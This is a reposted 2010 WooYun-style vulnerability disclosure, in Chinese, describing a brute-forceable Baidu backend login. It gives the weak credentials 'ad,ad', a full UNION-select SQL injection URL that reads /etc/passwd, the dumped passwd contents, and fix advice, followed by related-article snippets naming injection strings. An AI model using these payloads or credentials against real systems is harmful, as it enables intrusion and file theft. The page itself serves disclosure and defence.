Baidu某系统后台存在sql注入漏洞

最新推荐文章于 2025-12-03 12:41:58 发布
原创 最新推荐文章于 2025-12-03 12:41:58 发布 · 3.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #安全 #hack #wooyun

此博客揭示了百度系统后台在2010年存在未加验证码的安全漏洞,可通过弱口令进入,随后发现存在整数型SQL注入漏洞,能窃取数据库信息。建议采取限制IP、强化密码策略和添加验证码等修复措施。

漏洞详情

披露状态:

2010-07-26: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-25: 细节向公众公开

简要描述:

Baidu某系统后台登录界面没有验证码等防范暴力破解措施,并且提示信息能够显示是否存在某用户名
登录后,发现某url存在integer型sql注入漏洞,能够爆库并读取任意文件。

详细说明:

利用http://utility.baidu.com/traf/ 存在的弱口令 ad,ad可以进入到后台。
url:http://utility.baidu.com/traf/detail.php?aid=215 存在整数型 sql 注入漏洞。

漏洞证明:

http://utility.baidu.com/traf/detail.php?aid=1894%20and%201=2%20union%20select%20concat%28char%2894%29,char%2894%29,char%2894%29,load_file%280x2f6574632f706173737764%29,char%2894%29,char%2894%29,char%2894%29%29,1,1,1,1,1,1,1%20--
root:x:0:0:root:/root:/bin/bash
****
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
radvd:x:75:75:radvd user:/:/bin/false
rd:x:501:504::/home/rd:/bin/bash
work:x:502:504::/home/work:/bin/bash

修复方案:

建议:
限制能够访问该后台地址的ip;
强化密码策略;
添加验证码;
修改用户名或密码错误提示;
避免sql注入

版权声明:转载请注明来源 henrys_dad@乌云

Sword-heart
关注
用友U8 Cloud uapbd.refdef.query SQL注入漏洞复现
0xSec
11-01 562
用友U8 Cloud uapbd.refdef.query 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL注入漏洞sqlmap自动注入
XZZbh的博客
09-19 788
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
百度某频道存在sql注入漏洞
swordheart的博客
04-15 1357
漏洞详情 披露状态: 2010-07-25: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-24: 细节向公众公开 简要描述: 可做case判断等,具体利用请自行测试 详细说明: 存在于http://youxi.m.baidu.com频道,手机浏览的 漏洞证明: http://you
网页是否存在SQL注入(单引号判断法)
菜鸟-传奇
11-10 6168
是否存在SQL注入的简单判断 单引号判断 $id参数左右有数字型(无)、单引号、双引号、括号等方式组成闭合; 最为经典的单引号判断法: 在参数后面加上单引号,比如:   http://xxx/abc.php?id=1'   如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。   通常 Sql 注入漏洞分为 2 种类型:   数字型   字符...
RPC漏洞的通用分析方法(图)
瞎几把学
01-11 2867
 作者:Friddy一.工具准备1.IDA Pro Advanced 5.2(强大的静态逆向工具)2.HexRays(强大的可以将汇编代码转换为高质量的C代码的IDA插件)3.mIDA(极好的抽象RPC接口的IDA插件)二.找到溢出点1.补丁比较。(1)保留没有更新的文件到文件夹Old(2)打补丁,将更新后的文件放到文件夹New(3)使用“Darun Grim”等类似的补丁比较工具进行
百度系统登陆页面跨站及CSRF漏洞
swordheart的博客
04-15 1786
漏洞详情 披露状态: 2010-07-25: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-25: 细节向公众公开 简要描述: 百度系统登陆页面存在跨站及CSRF漏洞。 详细说明: http://data.baidu.com:80/report/accounts/checkLogin?
SQL注入获取用户名密码练习(integer型注入
热门推荐
nielilijy的专栏
08-07 1万+
万能密码 ' or 1='1 select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’ select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’ 1=‘1’ 永远为真 这个也是OWASP放出来的一个web安全学习平台,PHP+M...
后台管理系统SQL注入漏洞
hackzkaq的博客
10-20 605
在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点。确认目标身份(使用的quake进行然后去ipc备案查询)网站后台很像cms搭建的,在查看网站时发现。还有其他的,打算一个一个尝试看看。直接去百度一手,发现有个。
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全资讯
08-10 506
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞存在高危的parse_str函数sql注入漏...
泛微e-cology9 <0.56 存在sql注入漏洞
murphysec的博客
03-01 1230
泛微e-cology9 是一个 OA 系统。 泛微e-cology9 10.56 之前版本存在 sql 注入漏洞,攻击者可利用该漏洞读取或修改数据库中的敏感信息,进而操控管理系统
Discuz X 系列全版本 后台Sql注入漏洞
bulangman277的博客
12-28 3934
Discuz! X 系列全版本 后台Sql注入漏洞
利用SQL注入漏洞登录后台
weixin_33787529的博客
04-17 4562
2019独角兽企业重金招聘Python工程师标准>>> ...
项目常见SQL注入漏洞攻击及解决办法
u010174217的专栏
06-23 7232
项目接口常见SQL注入漏洞攻击及解决办法 1、弱口令漏洞 解决方案:使用至少6位的数字、字母及特殊字符组合作为密码。数据库不要存储明文密码,应存储加密后的密文。 2、未使用用户名及密码登录后台可直接输入后台URL登录系统。 解决方案:通过配置拦截器过滤掉无效用户的连接请求。 3、接口返回的信息中抛出的异常可能暴露程序信息。有经验的入侵者,可以从抛出的异常中获取很多信息,比如程序的部分架构、程序的物理路径、SQL注入爆出来的信息等。 解决方案:自定义一个Exception,将异常信息包装起来不要抛到
某shop后台sql注入漏洞
bishan4656的博客
07-05 1083
前言 最近看了下tpshop,审计出几个鸡肋的漏洞,这个SQL注入漏洞是其中之一。然后审计完网上搜了一下发现有一堆后台sql注入漏洞,应该是觉得后台SQL不用修叭(我个人是可以理解的)。 漏洞触发点 首先要登录后台,这也是我说漏洞很鸡肋的原因。漏洞位于在后台的商城-》文章->文章列表处的搜索抓包,存在漏洞的参数是keywords,当输入payload' or length(databas...
Phpmyadmin 后台sql注入漏洞(CVE-2020-5504)
玄道的网安博客
11-29 3708
漏洞概述 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 查看补丁 修改了username处,这就是注入点了 影响版本 Phpmyadmin <= 5.00 Phpmyadmin <= 4.94 漏洞复现 phpmyadmin5.0下载地址 https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdm.
网络安全防护指南:筑牢网络安全防线(510)
2509_94105975的博客
12-01 764
网络是指由计算机或者其他信息终端及相关设备组成的按照一定的规则和程序对信息收集、存储、传输、交换、处理的系统。在当今数字化时代,网络已经成为人们生活和工作中不可或缺的一部分。它连接了世界各地的人们,使得信息的传递和交流变得更加便捷高效。
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1680
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
企业级Web安全加速方案:一体化防护DDoS/CC/爬虫攻击
2201_76066823的博客
12-02 367
针对DDoS、CC攻击及恶意爬虫的一体化防护方案需整合多层防御策略,结合流量清洗、行为分析、智能验证等技术,确保业务高可用性与数据安全
网络安全系列:系统后门与持久化技术深度解析
最新发布
PyHaVolask的博客
12-03 1322
本文系统阐述渗透测试中维持访问权限的核心技术,详细解析服务绑定、注册表自启动等持久化机制,涵盖Certutil/Bitsadmin远程下载、Meterpreter进程迁移与痕迹清理等高级操作,并提供完整的防御检测与应急响应方案,强调技术沉淀与合法授权的重要性。
ASP后台网站流量统计系统开发与应用
- **安全性**:确保后台系统安全,防范SQL注入、XSS攻击等安全威胁。 #### 4. ASP后台的优化与维护 - **代码优化**:确保ASP代码运行效率,减少不必要的数据库查询。 - **安全更新**:定期更新ASP环境和应用,修补...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值